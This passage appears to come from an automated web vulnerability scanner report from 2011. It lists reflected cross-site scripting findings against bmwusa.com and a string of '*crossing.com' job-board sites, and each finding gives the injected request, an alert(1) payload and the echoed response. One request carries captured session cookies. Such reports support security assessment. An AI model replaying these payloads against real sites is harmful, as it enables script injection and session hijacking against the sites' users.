window.top.location.href = '/Secured/Content/Forms/Login.aspx?ReturnUrl=%2fSecured%2fContent9d8ef'-alert(1)-'df58b41138a%2fForms%2fLogin.aspx&Scheme=http';//]]>
...[SNIP]...

3.21. https://www.bmwusa.com/Secured/Content/Forms/Login.aspx [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.bmwusa.com
Path:	/Secured/Content/Forms/Login.aspx

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b684e'-alert(1)-'9a7cf2385d7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /Secured/Content/Formsb684e'-alert(1)-'9a7cf2385d7/Login.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 19:53:01 GMT
Content-Length: 855
Connection: close
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3661;expires=Fri, 21-Jan-11 20:13:01 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>

</title><
...[SNIP]...
<![CDATA[
window.top.location.href = '/Secured/Content/Forms/Login.aspx?ReturnUrl=%2fSecured%2fContent%2fFormsb684e'-alert(1)-'9a7cf2385d7%2fLogin.aspx&Scheme=http';//]]>
...[SNIP]...

3.22. http://www.businessanalystcrossing.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.businessanalystcrossing.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49621"><script>alert(1)</script>9f0d446c23d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?49621"><script>alert(1)</script>9f0d446c23d=1 HTTP/1.1
Host: www.businessanalystcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:23:51 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=nko903j62s8hf5uker5sj8gj93; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:23:51 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:23:51 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:23:51 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:23:51 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:23:51 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:23:51 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:23:51 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:23:51 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 124014

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.businessanalystcrossing.com/?49621"><script>alert(1)</script>9f0d446c23d=1">
...[SNIP]...

3.23. http://www.businessdevelopmentcrossing.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.businessdevelopmentcrossing.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9aad7"><script>alert(1)</script>02c3a5f308a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?9aad7"><script>alert(1)</script>02c3a5f308a=1 HTTP/1.1
Host: www.businessdevelopmentcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:23:47 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=v9534hooe5m897h1jlbrva77o0; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:23:47 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:23:47 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:23:47 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:23:47 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:23:47 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:23:47 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:23:47 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:23:47 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 116498

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.businessdevelopmentcrossing.com/?9aad7"><script>alert(1)</script>02c3a5f308a=1">
...[SNIP]...

3.24. http://www.callcentercrossing.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.callcentercrossing.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6504"><script>alert(1)</script>7995d983aaf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?c6504"><script>alert(1)</script>7995d983aaf=1 HTTP/1.1
Host: www.callcentercrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:23:51 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=ukmvtrcjop68ja9nosi7cu1gh0; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:23:51 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:23:51 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:23:51 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:23:51 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:23:51 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:23:51 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:23:51 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:23:51 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 128714

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.callcentercrossing.com/?c6504"><script>alert(1)</script>7995d983aaf=1">
...[SNIP]...

3.25. http://www.chefcrossing.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.chefcrossing.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e49f"><script>alert(1)</script>83eb7ba08ba was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?7e49f"><script>alert(1)</script>83eb7ba08ba=1 HTTP/1.1
Host: www.chefcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:23:52 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=h114rspv6dqv9rpk6cv7rlc1e3; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:23:52 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:23:52 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:23:52 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:23:52 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:23:52 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:23:52 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:23:52 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:23:52 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 108693

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.chefcrossing.com/?7e49f"><script>alert(1)</script>83eb7ba08ba=1">
...[SNIP]...

3.26. http://www.civilengineeringcrossing.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.civilengineeringcrossing.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7038b"><script>alert(1)</script>ca314792d87 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?7038b"><script>alert(1)</script>ca314792d87=1 HTTP/1.1
Host: www.civilengineeringcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:24:05 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=qi73gk7b0plggdca89edb7am13; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:24:05 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:24:05 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:24:05 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:24:05 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:24:05 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:24:05 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:24:05 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:24:05 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 106933

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.civilengineeringcrossing.com/?7038b"><script>alert(1)</script>ca314792d87=1">
...[SNIP]...

3.27. http://www.clevelcrossing.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.clevelcrossing.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55eeb"><script>alert(1)</script>20005e8749b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?55eeb"><script>alert(1)</script>20005e8749b=1 HTTP/1.1
Host: www.clevelcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:24:16 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=fqj28nd85kg23ge7evi2b009i7; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:24:16 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:24:16 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:24:16 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:24:16 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:24:16 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:24:16 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:24:16 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:24:16 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 115435

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.clevelcrossing.com/?55eeb"><script>alert(1)</script>20005e8749b=1">
...[SNIP]...

3.28. http://www.clinicalresearchcrossing.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.clinicalresearchcrossing.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 858e3"><script>alert(1)</script>870d36a3611 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?858e3"><script>alert(1)</script>870d36a3611=1 HTTP/1.1
Host: www.clinicalresearchcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:24:24 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=m4vok3ds4b8veedmh32e13pcl6; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:24:24 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:24:24 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:24:24 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:24:24 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:24:24 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:24:24 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:24:24 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:24:24 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 101481

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.clinicalresearchcrossing.com/?858e3"><script>alert(1)</script>870d36a3611=1">
...[SNIP]...

3.29. http://www.compliancecrossing.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.compliancecrossing.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72153"><script>alert(1)</script>0fab5129a6b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?72153"><script>alert(1)</script>0fab5129a6b=1 HTTP/1.1
Host: www.compliancecrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:24:33 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=mb7anjkk7acvsh1kr8ousr40i4; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:24:34 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:24:34 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:24:34 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:24:34 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:24:34 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:24:34 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:24:34 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:24:34 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 135107

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.compliancecrossing.com/?72153"><script>alert(1)</script>0fab5129a6b=1">
...[SNIP]...

3.30. http://www.computeraideddesigncrossing.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.computeraideddesigncrossing.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1752d"><script>alert(1)</script>11735ab5ac7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?1752d"><script>alert(1)</script>11735ab5ac7=1 HTTP/1.1
Host: www.computeraideddesigncrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:24:27 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=ed21alnsfs6f26cfhvjk1jc6s7; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:24:27 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:24:27 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:24:27 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:24:27 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:24:27 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:24:27 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:24:27 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:24:27 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 120988

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.computeraideddesigncrossing.com/?1752d"><script>alert(1)</script>11735ab5ac7=1">
...[SNIP]...

3.31. http://www.constructioncrossing.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.constructioncrossing.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac657"><script>alert(1)</script>1735ed5792f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?ac657"><script>alert(1)</script>1735ed5792f=1 HTTP/1.1
Host: www.constructioncrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:24:33 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=0glasi0furb49t09sf8usk8131; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:24:34 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:24:34 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:24:34 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:24:34 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:24:34 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:24:34 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:24:34 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:24:34 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 131646

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.constructioncrossing.com/?ac657"><script>alert(1)</script>1735ed5792f=1">
...[SNIP]...

3.32. http://www.consultingcrossing.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.consultingcrossing.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd97c"><script>alert(1)</script>8601e5cd1fd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?fd97c"><script>alert(1)</script>8601e5cd1fd=1 HTTP/1.1
Host: www.consultingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

3.33. http://www.contractmanagementcrossing.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.contractmanagementcrossing.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d62a6"><script>alert(1)</script>6f6a8319c16 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?d62a6"><script>alert(1)</script>6f6a8319c16=1 HTTP/1.1
Host: www.contractmanagementcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:24:39 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=10pkrahhva0p5pupcvs1ma41n4; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:24:39 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:24:39 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:24:39 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:24:39 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:24:39 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:24:39 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:24:39 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:24:39 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 111842

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.contractmanagementcrossing.com/?d62a6"><script>alert(1)</script>6f6a8319c16=1">
...[SNIP]...

3.34. http://www.counselingcrossing.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.counselingcrossing.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 662a5"><script>alert(1)</script>9af98f88fd9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?662a5"><script>alert(1)</script>9af98f88fd9=1 HTTP/1.1
Host: www.counselingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:24:53 GMT
Server: Apache
